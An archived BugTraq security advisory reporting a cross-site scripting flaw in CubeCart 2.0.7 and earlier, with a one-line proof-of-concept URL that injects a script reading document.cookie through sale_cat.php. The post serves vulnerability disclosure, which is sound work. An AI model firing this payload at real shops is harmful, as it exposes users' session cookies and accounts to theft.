BugTraq
XSS in CubeCart <= 2.0.7 Mar 06 2011 08:41PM
Michele Spagnuolo (mikispag gmail com)
CubeCart (http://www.cubecart.com) up to version 2.0.7 inclusive are vulnerable to a XSS in sale_cat.php.

http://www.example.com/storedirectory/sale_cat.php/";<script>alert(docum
ent.cookie)</script>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus